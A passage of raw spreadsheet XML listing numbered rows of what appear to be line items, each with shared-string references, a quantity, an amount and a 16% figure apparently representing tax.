        <v>2024</v>
      </c>
      <c r="C1990" s="238" t="s">
        <v>10182</v>
      </c>
      <c r="D1990" s="238" t="s">
        <v>10183</v>
      </c>
      <c r="E1990" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1990" s="238" t="s">
        <v>10184</v>
      </c>
      <c r="G1990" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1990" s="10">
        <v>55</v>
      </c>
      <c r="I1990" s="14">
        <v>634.5</v>
      </c>
      <c r="J1990" s="15">
        <v>101.552</v>
      </c>
      <c r="K1990" s="16"/>
    </row>
    <row r="1991" spans="2:11">
      <c r="B1991" s="9">
        <v>2025</v>
      </c>
      <c r="C1991" s="238" t="s">
        <v>10185</v>
      </c>
      <c r="D1991" s="238" t="s">
        <v>10186</v>
      </c>
      <c r="E1991" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1991" s="238" t="s">
        <v>10187</v>
      </c>
      <c r="G1991" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1991" s="10">
        <v>2</v>
      </c>
      <c r="I1991" s="14">
        <v>63.92</v>
      </c>
      <c r="J1991" s="15">
        <v>10.2272</v>
      </c>
      <c r="K1991" s="16"/>
    </row>
    <row r="1992" spans="2:11">
      <c r="B1992" s="9">
        <v>2026</v>
      </c>
      <c r="C1992" s="238" t="s">
        <v>10188</v>
      </c>
      <c r="D1992" s="238" t="s">
        <v>10189</v>
      </c>
      <c r="E1992" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1992" s="238" t="s">
        <v>10190</v>
      </c>
      <c r="G1992" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1992" s="10">
        <v>5</v>
      </c>
      <c r="I1992" s="14">
        <v>110.18</v>
      </c>
      <c r="J1992" s="15">
        <v>17.632</v>
      </c>
      <c r="K1992" s="16"/>
    </row>
    <row r="1993" spans="2:11">
      <c r="B1993" s="9">
        <v>2027</v>
      </c>
      <c r="C1993" s="238" t="s">
        <v>10191</v>
      </c>
      <c r="D1993" s="238" t="s">
        <v>10192</v>
      </c>
      <c r="E1993" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1993" s="238" t="s">
        <v>10193</v>
      </c>
      <c r="G1993" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1993" s="10">
        <v>5</v>
      </c>
      <c r="I1993" s="14">
        <v>100.83</v>
      </c>
      <c r="J1993" s="15">
        <v>16.136</v>
      </c>
      <c r="K1993" s="16"/>
    </row>
    <row r="1994" spans="2:11">
      <c r="B1994" s="9">
        <v>2028</v>
      </c>
      <c r="C1994" s="238" t="s">
        <v>10194</v>
      </c>
      <c r="D1994" s="238" t="s">
        <v>10195</v>
      </c>
      <c r="E1994" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1994" s="238" t="s">
        <v>10196</v>
      </c>
      <c r="G1994" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1994" s="10">
        <v>7</v>
      </c>
      <c r="I1994" s="14">
        <v>206.41</v>
      </c>
      <c r="J1994" s="15">
        <v>33.0288</v>
      </c>
      <c r="K1994" s="16"/>
    </row>
    <row r="1995" spans="2:11">
      <c r="B1995" s="9">
        <v>2029</v>
      </c>
      <c r="C1995" s="238" t="s">
        <v>10197</v>
      </c>
      <c r="D1995" s="238" t="s">
        <v>10198</v>
      </c>
      <c r="E1995" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1995" s="238" t="s">
        <v>10199</v>
      </c>
      <c r="G1995" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1995" s="10">
        <v>4</v>
      </c>
      <c r="I1995" s="14">
        <v>335.04</v>
      </c>
      <c r="J1995" s="15">
        <v>53.6064</v>
      </c>
      <c r="K1995" s="16"/>
    </row>
    <row r="1996" spans="2:11">
      <c r="B1996" s="9">
        <v>2030</v>
      </c>
      <c r="C1996" s="238" t="s">
        <v>10200</v>
      </c>
      <c r="D1996" s="238" t="s">
        <v>10201</v>
      </c>
      <c r="E1996" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F1996" s="238" t="s">
        <v>10202</v>
      </c>
      <c r="G1996" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1996" s="10">
        <v>2</v>
      </c>
      <c r="I1996" s="14">
        <v>133.33</v>
      </c>
      <c r="J1996" s="15">
        <v>21.3344</v>
      </c>
      <c r="K1996" s="16"/>
    </row>
    <row r="1997" spans="2:11">
      <c r="B1997" s="9">
        <v>2031</v>
      </c>
      <c r="C1997" s="238" t="s">
        <v>10203</v>
      </c>
      <c r="D1997" s="238" t="s">
        <v>10204</v>
      </c>
      <c r="E1997" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1997" s="238" t="s">
        <v>10202</v>
      </c>
      <c r="G1997" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1997" s="10">
        <v>9</v>
      </c>
      <c r="I1997" s="14">
        <v>253.85</v>
      </c>
      <c r="J1997" s="15">
        <v>40.6224</v>
      </c>
      <c r="K1997" s="16"/>
    </row>
    <row r="1998" spans="2:11">
      <c r="B1998" s="9">
        <v>2032</v>
      </c>
      <c r="C1998" s="238" t="s">
        <v>10205</v>
      </c>
      <c r="D1998" s="238" t="s">
        <v>10206</v>
      </c>
      <c r="E1998" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1998" s="238" t="s">
        <v>10207</v>
      </c>
      <c r="G1998" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1998" s="10">
        <v>2</v>
      </c>
      <c r="I1998" s="14">
        <v>107.69</v>
      </c>
      <c r="J1998" s="15">
        <v>17.232</v>
      </c>
      <c r="K1998" s="16"/>
    </row>
    <row r="1999" spans="2:11">
      <c r="B1999" s="9">
        <v>2033</v>
      </c>
      <c r="C1999" s="238" t="s">
        <v>10208</v>
      </c>
      <c r="D1999" s="238" t="s">
        <v>10209</v>
      </c>
      <c r="E1999" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F1999" s="238" t="s">
        <v>10210</v>
      </c>
      <c r="G1999" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1999" s="10">
        <v>2</v>
      </c>
      <c r="I1999" s="14">
        <v>71.39</v>
      </c>
      <c r="J1999" s="15">
        <v>11.424</v>
      </c>
      <c r="K1999" s="16"/>
    </row>
    <row r="2000" spans="2:11">
      <c r="B2000" s="9">
        <v>2034</v>
      </c>
      <c r="C2000" s="238" t="s">
        <v>10211</v>
      </c>
      <c r="D2000" s="238" t="s">
        <v>10212</v>
      </c>
      <c r="E2000" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2000" s="238" t="s">
        <v>10213</v>
      </c>
      <c r="G2000" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2000" s="10">
        <v>2</v>
      </c>
      <c r="I2000" s="14">
        <v>19.77</v>
      </c>
      <c r="J2000" s="15">
        <v>3.1648</v>
      </c>
      <c r="K2000" s="16"/>
    </row>
    <row r="2001" spans="2:11">
      <c r="B2001" s="9">
        <v>2035</v>
      </c>
      <c r="C2001" s="238" t="s">
        <v>10214</v>
      </c>
      <c r="D2001" s="238" t="s">
        <v>10215</v>
      </c>
      <c r="E2001" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2001" s="238" t="s">
        <v>10216</v>
      </c>
      <c r="G2001" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2001" s="10">
        <v>2</v>
      </c>
      <c r="I2001" s="14">
        <v>111.11</v>
      </c>
      <c r="J2001" s="15">
        <v>17.7792</v>
      </c>
      <c r="K2001" s="16"/>
    </row>
    <row r="2002" spans="2:11">
      <c r="B2002" s="9">
        <v>2036</v>
      </c>
      <c r="C2002" s="238" t="s">
        <v>10217</v>
      </c>
      <c r="D2002" s="238" t="s">
        <v>10218</v>
      </c>
      <c r="E2002" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2002" s="238" t="s">
        <v>10219</v>
      </c>
      <c r="G2002" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2002" s="10">
        <v>17</v>
      </c>
      <c r="I2002" s="14">
        <v>476.47</v>
      </c>
      <c r="J2002" s="15">
        <v>76.2416</v>
      </c>
      <c r="K2002" s="16"/>
    </row>
    <row r="2003" spans="2:11">
      <c r="B2003" s="9">
        <v>2037</v>
      </c>
      <c r="C2003" s="238" t="s">
        <v>10220</v>
      </c>
      <c r="D2003" s="238" t="s">
        <v>10221</v>
      </c>
      <c r="E2003" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2003" s="238" t="s">
        <v>10222</v>
      </c>
      <c r="G2003" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2003" s="10">
        <v>3</v>
      </c>
      <c r="I2003" s="14">
        <v>87.6</v>
      </c>
      <c r="J2003" s="15">
        <v>14.016</v>
      </c>
      <c r="K2003" s="16"/>
    </row>
    <row r="2004" spans="2:11">
      <c r="B2004" s="9">
        <v>2038</v>
      </c>
      <c r="C2004" s="238" t="s">
        <v>10223</v>
      </c>
      <c r="D2004" s="238" t="s">
        <v>10224</v>
      </c>
      <c r="E2004" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2004" s="238" t="s">
        <v>10225</v>
      </c>
      <c r="G2004" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2004" s="10">
        <v>6</v>
      </c>
      <c r="I2004" s="14">
        <v>371.31</v>
      </c>
      <c r="J2004" s="15">
        <v>59.4144</v>
      </c>
      <c r="K2004" s="16"/>
    </row>
    <row r="2005" spans="2:11">
      <c r="B2005" s="9">
        <v>2039</v>
      </c>
      <c r="C2005" s="238" t="s">
        <v>10226</v>
      </c>
      <c r="D2005" s="238" t="s">
        <v>10227</v>
      </c>
      <c r="E2005" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2005" s="238" t="s">
        <v>10228</v>
      </c>
      <c r="G2005" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2005" s="10">
        <v>2</v>
      </c>
      <c r="I2005" s="14">
        <v>40</v>
      </c>
      <c r="J2005" s="15">
        <v>6.4</v>
      </c>
      <c r="K2005" s="16"/>
    </row>
    <row r="2006" spans="2:11">
      <c r="B2006" s="9">
        <v>2040</v>
      </c>
      <c r="C2006" s="238" t="s">
        <v>10229</v>
      </c>
      <c r="D2006" s="238" t="s">
        <v>10230</v>
      </c>
      <c r="E2006" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2006" s="238" t="s">
        <v>10231</v>
      </c>
      <c r="G2006" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2006" s="10">
        <v>4</v>
      </c>
      <c r="I2006" s="14">
        <v>250.42</v>
      </c>
      <c r="J2006" s="15">
        <v>40.0704</v>
      </c>
      <c r="K2006" s="16"/>
    </row>
    <row r="2007" spans="2:11">
      <c r="B2007" s="9">
        <v>2041</v>
      </c>
      <c r="C2007" s="238" t="s">
        <v>10232</v>
      </c>
      <c r="D2007" s="238" t="s">
        <v>10233</v>
      </c>
      <c r="E2007" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F2007" s="238" t="s">
        <v>10231</v>
      </c>
      <c r="G2007" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2007" s="10">
        <v>3</v>
      </c>
      <c r="I2007" s="14">
        <v>348.72</v>
      </c>
      <c r="J2007" s="15">
        <v>55.7952</v>
      </c>
      <c r="K2007" s="16"/>
    </row>
    <row r="2008" spans="2:11">
      <c r="B2008" s="9">
        <v>2042</v>
      </c>
      <c r="C2008" s="238" t="s">
        <v>10234</v>
      </c>
      <c r="D2008" s="238" t="s">
        <v>10235</v>
      </c>
      <c r="E2008" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2008" s="238" t="s">
        <v>10236</v>
      </c>
      <c r="G2008" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2008" s="10">
        <v>1</v>
      </c>
      <c r="I2008" s="14">
        <v>8.36</v>
      </c>
      <c r="J2008" s="15">
        <v>1.3376</v>
      </c>
      <c r="K2008" s="16"/>
    </row>
    <row r="2009" spans="2:11">
      <c r="B2009" s="9">
        <v>2043</v>
      </c>
      <c r="C2009" s="238" t="s">
        <v>10237</v>
      </c>
      <c r="D2009" s="238" t="s">
        <v>10238</v>
      </c>
      <c r="E2009" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2009" s="238" t="s">
        <v>10239</v>
      </c>
      <c r="G2009" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2009" s="10">
        <v>8</v>
      </c>
      <c r="I2009" s="14">
        <v>123.58</v>
      </c>
      <c r="J2009" s="15">
        <v>19.776</v>
      </c>
      <c r="K2009" s="16"/>
    </row>
    <row r="2010" spans="2:11">
      <c r="B2010" s="9">
        <v>2044</v>
      </c>
      <c r="C2010" s="238" t="s">
        <v>10240</v>
      </c>
      <c r="D2010" s="238" t="s">
        <v>10241</v>
      </c>
      <c r="E2010" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2010" s="238" t="s">
        <v>10242</v>
      </c>
      <c r="G2010" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2010" s="10">
        <v>8</v>
      </c>
      <c r="I2010" s="14">
        <v>133.67</v>
      </c>
      <c r="J2010" s="15">
        <v>21.3888</v>
      </c>
      <c r="K2010" s="16"/>
    </row>
    <row r="2011" spans="2:11">
      <c r="B2011" s="9">
        <v>2045</v>
      </c>
      <c r="C2011" s="238" t="s">
        <v>10243</v>
      </c>
      <c r="D2011" s="238" t="s">
        <v>10244</v>
      </c>
      <c r="E2011" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2011" s="238" t="s">
        <v>10245</v>
      </c>
      <c r="G2011" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2011" s="10">
        <v>6</v>
      </c>
      <c r="I2011" s="14">
        <v>377.42</v>
      </c>
      <c r="J2011" s="15">
        <v>60.384</v>
      </c>
      <c r="K2011" s="16"/>
    </row>
    <row r="2012" spans="2:11">
      <c r="B2012" s="9">
        <v>2046</v>
      </c>
      <c r="C2012" s="238" t="s">
        <v>10246</v>
      </c>
      <c r="D2012" s="238" t="s">
        <v>10065</v>
      </c>
      <c r="E2012" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2012" s="238" t="s">
        <v>10247</v>
      </c>
      <c r="G2012" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2012" s="10">
        <v>4</v>
      </c>
      <c r="I2012" s="14">
        <v>529.91</v>
      </c>
      <c r="J2012" s="15">
        <v>84.7872</v>
      </c>
      <c r="K2012" s="16"/>
    </row>
    <row r="2013" spans="2:11">
      <c r="B2013" s="9">
        <v>2047</v>
      </c>
      <c r="C2013" s="238" t="s">
        <v>10248</v>
      </c>
      <c r="D2013" s="238" t="s">
        <v>10249</v>
      </c>
      <c r="E2013" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2013" s="238" t="s">
        <v>10250</v>
      </c>
      <c r="G2013" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2013" s="10">
        <v>9</v>
      </c>
      <c r="I2013" s="14">
        <v>632.27</v>
      </c>
      <c r="J2013" s="15">
        <v>101.16</v>
      </c>
      <c r="K2013" s="16"/>
    </row>
    <row r="2014" spans="2:11">
      <c r="B2014" s="9">
        <v>2048</v>
      </c>
      <c r="C2014" s="238" t="s">
        <v>10251</v>
      </c>
      <c r="D2014" s="238" t="s">
        <v>10252</v>
      </c>
      <c r="E2014" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F2014" s="238" t="s">
        <v>10253</v>
      </c>
      <c r="G2014" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2014" s="10">
        <v>4</v>
      </c>
      <c r="I2014" s="14">
        <v>635.89</v>
      </c>
      <c r="J2014" s="15">
        <v>101.7408</v>
      </c>
      <c r="K2014" s="16"/>
    </row>
    <row r="2015" spans="2:11">
      <c r="B2015" s="9">
        <v>2049</v>
      </c>
      <c r="C2015" s="238" t="s">
        <v>10254</v>
      </c>
      <c r="D2015" s="238" t="s">
        <v>10255</v>
      </c>
      <c r="E2015" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2015" s="238" t="s">
        <v>10256</v>
      </c>
      <c r="G2015" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2015" s="10">
        <v>3</v>
      </c>
      <c r="I2015" s="14">
        <v>974.35</v>
      </c>
      <c r="J2015" s="15">
        <v>155.8944</v>
      </c>
      <c r="K2015" s="16"/>
    </row>
    <row r="2016" spans="2:11">
      <c r="B2016" s="9">
        <v>2050</v>
      </c>
      <c r="C2016" s="238" t="s">
        <v>10257</v>
      </c>
      <c r="D2016" s="238" t="s">
        <v>10258</v>
      </c>
      <c r="E2016" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2016" s="238" t="s">
        <v>10259</v>
      </c>
      <c r="G2016" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2016" s="10">
        <v>6</v>
      </c>
      <c r="I2016" s="14">
        <v>1230.7</v>
      </c>
      <c r="J2016" s="15">
        <v>196.9152</v>
      </c>
      <c r="K2016" s="16"/>
    </row>
    <row r="2017" spans="2:11">
      <c r="B2017" s="9">
        <v>2051</v>
      </c>
      <c r="C2017" s="238" t="s">
        <v>10260</v>
      </c>
      <c r="D2017" s="238" t="s">
        <v>10261</v>
      </c>
      <c r="E2017" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2017" s="238" t="s">
        <v>10262</v>
      </c>
      <c r="G2017" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2017" s="10">
        <v>4</v>
      </c>
      <c r="I2017" s="14">
        <v>1230.78</v>
      </c>
      <c r="J2017" s="15">
        <v>196.928</v>
      </c>
      <c r="K2017" s="16"/>
    </row>
    <row r="2018" spans="2:11">
      <c r="B2018" s="9">
        <v>2052</v>
      </c>
      <c r="C2018" s="238" t="s">
        <v>10263</v>
      </c>
      <c r="D2018" s="238" t="s">
        <v>10264</v>
      </c>
      <c r="E2018" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2018" s="238" t="s">
        <v>10265</v>
      </c>
      <c r="G2018" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2018" s="10">
        <v>10</v>
      </c>
      <c r="I2018" s="14">
        <v>564.1</v>
      </c>
      <c r="J2018" s="15">
        <v>90.256</v>
      </c>
      <c r="K2018" s="16"/>
    </row>
    <row r="2019" spans="2:11">
      <c r="B2019" s="9">
        <v>2053</v>
      </c>
      <c r="C2019" s="238" t="s">
        <v>10266</v>
      </c>
      <c r="D2019" s="238" t="s">
        <v>10267</v>
      </c>
      <c r="E2019" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2019" s="238" t="s">
        <v>10268</v>
      </c>
      <c r="G2019" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2019" s="10">
        <v>2</v>
      </c>
      <c r="I2019" s="14">
        <v>131.27</v>
      </c>
      <c r="J2019" s="15">
        <v>21.0048</v>
      </c>
      <c r="K2019" s="16"/>
    </row>
    <row r="2020" spans="2:11">
      <c r="B2020" s="9">
        <v>2054</v>
      </c>
      <c r="C2020" s="238" t="s">
        <v>10269</v>
      </c>
      <c r="D2020" s="238" t="s">
        <v>10270</v>
      </c>
      <c r="E2020" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2020" s="238" t="s">
        <v>10271</v>
      </c>
      <c r="G2020" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2020" s="10">
        <v>2</v>
      </c>
      <c r="I2020" s="14">
        <v>145.3</v>
      </c>
      <c r="J2020" s="15">
        <v>23.248</v>
      </c>
      <c r="K2020" s="16"/>
    </row>
    <row r="2021" spans="2:11">
      <c r="B2021" s="9">
        <v>2055</v>
      </c>
      <c r="C2021" s="238" t="s">
        <v>10272</v>
      </c>
      <c r="D2021" s="238" t="s">
        <v>10273</v>
      </c>
      <c r="E2021" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2021" s="238" t="s">
        <v>10274</v>
      </c>
      <c r="G2021" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2021" s="10">
        <v>1</v>
      </c>
      <c r="I2021" s="14">
        <v>474.91</v>
      </c>
      <c r="J2021" s="15">
        <v>75.9856</v>
      </c>
      <c r="K2021" s="16"/>
    </row>
    <row r="2022" spans="2:11">
      <c r="B2022" s="9">
        <v>2056</v>
      </c>
      <c r="C2022" s="238" t="s">
        <v>10275</v>
      </c>
      <c r="D2022" s="238" t="s">
        <v>10065</v>
      </c>
      <c r="E2022" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2022" s="238" t="s">
        <v>10276</v>
      </c>
      <c r="G2022" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2022" s="10">
        <v>4</v>
      </c>
      <c r="I2022" s="14">
        <v>256.41</v>
      </c>
      <c r="J2022" s="15">
        <v>41.024</v>
      </c>
      <c r="K2022" s="16"/>
    </row>
    <row r="2023" spans="2:11">
      <c r="B2023" s="9">
        <v>2057</v>
      </c>
      <c r="C2023" s="238" t="s">
        <v>10277</v>
      </c>
      <c r="D2023" s="238" t="s">
        <v>10278</v>
      </c>
      <c r="E2023" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F2023" s="238" t="s">
        <v>10279</v>
      </c>
      <c r="G2023" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2023" s="10">
        <v>1</v>
      </c>
      <c r="I2023" s="14">
        <v>170.94</v>
      </c>
      <c r="J2023" s="15">
        <v>27.3504</v>
      </c>
      <c r="K2023" s="16"/>
    </row>
    <row r="2024" spans="2:11">
      <c r="B2024" s="9">
        <v>2058</v>
      </c>
      <c r="C2024" s="238" t="s">
        <v>10280</v>
      </c>
      <c r="D2024" s="238" t="s">
        <v>10281</v>
      </c>
      <c r="E2024" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2024" s="238" t="s">
        <v>10282</v>
      </c>
      <c r="G2024" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2024" s="10">
        <v>1</v>
      </c>
      <c r="I2024" s="14">
        <v>160</v>
      </c>
      <c r="J2024" s="15">
        <v>25.6</v>
      </c>
      <c r="K2024" s="16"/>
    </row>
    <row r="2025" spans="2:11">
      <c r="B2025" s="9">
        <v>2059</v>
      </c>
      <c r="C2025" s="238" t="s">
        <v>10283</v>
      </c>
      <c r="D2025" s="238" t="s">
        <v>10284</v>
      </c>
      <c r="E2025" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2025" s="238" t="s">
        <v>10285</v>
      </c>
      <c r="G2025" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2025" s="10">
        <v>2</v>
      </c>
      <c r="I2025" s="14">
        <v>700</v>
      </c>
      <c r="J2025" s="15">
        <v>112</v>
      </c>
      <c r="K2025" s="16"/>
    </row>
    <row r="2026" spans="2:11">
      <c r="B2026" s="9">
        <v>2060</v>
      </c>
      <c r="C2026" s="238" t="s">
        <v>10286</v>
      </c>
      <c r="D2026" s="238" t="s">
        <v>10287</v>
      </c>
      <c r="E2026" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2026" s="238" t="s">
        <v>10288</v>
      </c>
      <c r="G2026" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2026" s="10">
        <v>1</v>
      </c>
      <c r="I2026" s="14">
        <v>3360.87</v>
      </c>
      <c r="J2026" s="15">
        <v>537.7392</v>
      </c>
      <c r="K2026" s="16"/>
    </row>
    <row r="2027" spans="2:11">
      <c r="B2027" s="9">
        <v>2061</v>
      </c>
      <c r="C2027" s="238" t="s">
        <v>10289</v>
      </c>
      <c r="D2027" s="238" t="s">
        <v>10065</v>
      </c>
      <c r="E2027" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2027" s="238" t="s">
        <v>10290</v>
      </c>
      <c r="G2027" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2027" s="10">
        <v>8</v>
      </c>
      <c r="I2027" s="14">
        <v>247</v>
      </c>
      <c r="J2027" s="15">
        <v>39.5264</v>
      </c>
      <c r="K2027" s="16"/>
    </row>
    <row r="2028" spans="2:11">
      <c r="B2028" s="9">
        <v>2062</v>
      </c>
      <c r="C2028" s="238" t="s">
        <v>10291</v>
      </c>
      <c r="D2028" s="238" t="s">
        <v>10292</v>
      </c>
      <c r="E2028" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2028" s="238" t="s">
        <v>10293</v>
      </c>
      <c r="G2028" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2028" s="10">
        <v>4</v>
      </c>
      <c r="I2028" s="14">
        <v>232.48</v>
      </c>
      <c r="J2028" s="15">
        <v>37.1968</v>
      </c>
      <c r="K2028" s="16"/>
    </row>
    <row r="2029" spans="2:11">
      <c r="B2029" s="9">
        <v>2063</v>
      </c>
      <c r="C2029" s="238" t="s">
        <v>10294</v>
      </c>
      <c r="D2029" s="238" t="s">
        <v>10295</v>
      </c>
      <c r="E2029" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2029" s="238" t="s">
        <v>10296</v>
      </c>
      <c r="G2029" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2029" s="10">
        <v>4</v>
      </c>
      <c r="I2029" s="14">
        <v>170.93</v>
      </c>
      <c r="J2029" s="15">
        <v>27.3472</v>
      </c>
      <c r="K2029" s="16"/>
    </row>
    <row r="2030" spans="2:11">
      <c r="B2030" s="9">
        <v>2064</v>
      </c>
      <c r="C2030" s="238" t="s">
        <v>10297</v>
      </c>
      <c r="D2030" s="238" t="s">
        <v>10298</v>
      </c>
      <c r="E2030" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2030" s="238" t="s">
        <v>10299</v>
      </c>
      <c r="G2030" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2030" s="10">
        <v>6</v>
      </c>
      <c r="I2030" s="14">
        <v>112.81</v>
      </c>
      <c r="J2030" s="15">
        <v>18.048</v>
      </c>
      <c r="K2030" s="16"/>
    </row>
    <row r="2031" spans="2:11">
      <c r="B2031" s="9">
        <v>2065</v>
      </c>
      <c r="C2031" s="238" t="s">
        <v>10300</v>
      </c>
      <c r="D2031" s="238" t="s">
        <v>10301</v>
      </c>
      <c r="E2031" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F2031" s="238" t="s">
        <v>10302</v>
      </c>
      <c r="G2031" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2031" s="10">
        <v>1</v>
      </c>
      <c r="I2031" s="14">
        <v>17.08</v>
      </c>
      <c r="J2031" s="15">
        <v>2.7328</v>
      </c>
      <c r="K2031" s="16"/>
    </row>
    <row r="2032" spans="2:11">
      <c r="B2032" s="9">
        <v>2066</v>
      </c>
      <c r="C2032" s="238" t="s">
        <v>10303</v>
      </c>
      <c r="D2032" s="238" t="s">
        <v>10304</v>
      </c>
      <c r="E2032" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2032" s="238" t="s">
        <v>10305</v>
      </c>
      <c r="G2032" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2032" s="10">
        <v>2</v>
      </c>
      <c r="I2032" s="14">
        <v>410.26</v>
      </c>
      <c r="J2032" s="15">
        <v>65.6416</v>
      </c>
      <c r="K2032" s="16"/>
    </row>
    <row r="2033" spans="2:11">
      <c r="B2033" s="9">
        <v>2067</v>
      </c>
      <c r="C2033" s="238" t="s">
        <v>10306</v>
      </c>
      <c r="D2033" s="238" t="s">
        <v>10307</v>
      </c>
      <c r="E2033" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2033" s="238" t="s">
        <v>10308</v>
      </c>
      <c r="G2033" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2033" s="10">
        <v>9</v>
      </c>
      <c r="I2033" s="14">
        <v>423.06</v>
      </c>
      <c r="J2033" s="15">
        <v>67.6944</v>
      </c>
      <c r="K2033" s="16"/>
    </row>
    <row r="2034" spans="2:11">
      <c r="B2034" s="9">
        <v>2068</v>
      </c>
      <c r="C2034" s="238" t="s">
        <v>10309</v>
      </c>
      <c r="D2034" s="238" t="s">
        <v>10310</v>
      </c>
      <c r="E2034" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2034" s="238" t="s">
        <v>10311</v>
      </c>
      <c r="G2034" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2034" s="10">
        <v>8</v>
      </c>
      <c r="I2034" s="14">
        <v>1709.41</v>
      </c>
      <c r="J2034" s="15">
        <v>273.5104</v>
      </c>
      <c r="K2034" s="16"/>
    </row>
    <row r="2035" spans="2:11">
      <c r="B2035" s="9">
        <v>2069</v>
      </c>
      <c r="C2035" s="238" t="s">
        <v>10312</v>
      </c>
      <c r="D2035" s="238" t="s">
        <v>10313</v>
      </c>
      <c r="E2035" s="238" t="s">
        <v>10125</v>
      </c>
      <c r="F2035" s="238" t="s">
        <v>10314</v>
      </c>
      <c r="G2035" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2035" s="10">
        <v>2</v>
      </c>
      <c r="I2035" s="14">
        <v>6324.79</v>
      </c>
      <c r="J2035" s="15">
        <v>1011.968</v>
      </c>
      <c r="K2035" s="16"/>
    </row>
    <row r="2036" spans="2:11">
      <c r="B2036" s="9">
        <v>2070</v>
      </c>
      <c r="C2036" s="238" t="s">
        <v>10315</v>
      </c>
      <c r="D2036" s="238" t="s">
        <v>10316</v>
      </c>
      <c r="E2036" s="238" t="s">
        <v>7972</v>
      </c>
      <c r="F2036" s="238" t="s">
        <v>10317</v>
      </c>
      <c r="G2036" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2036" s="10">
        <v>6</v>
      </c>
      <c r="I2036" s="14">
        <v>1461.54</v>
      </c>
      <c r="J2036" s="15">
        <v>233.8464</v>
      </c>
      <c r="K2036" s="16"/>
    </row>
    <row r="2037" spans="2:11">
      <c r="B2037" s="9">
        <v>2071</v>
      </c>
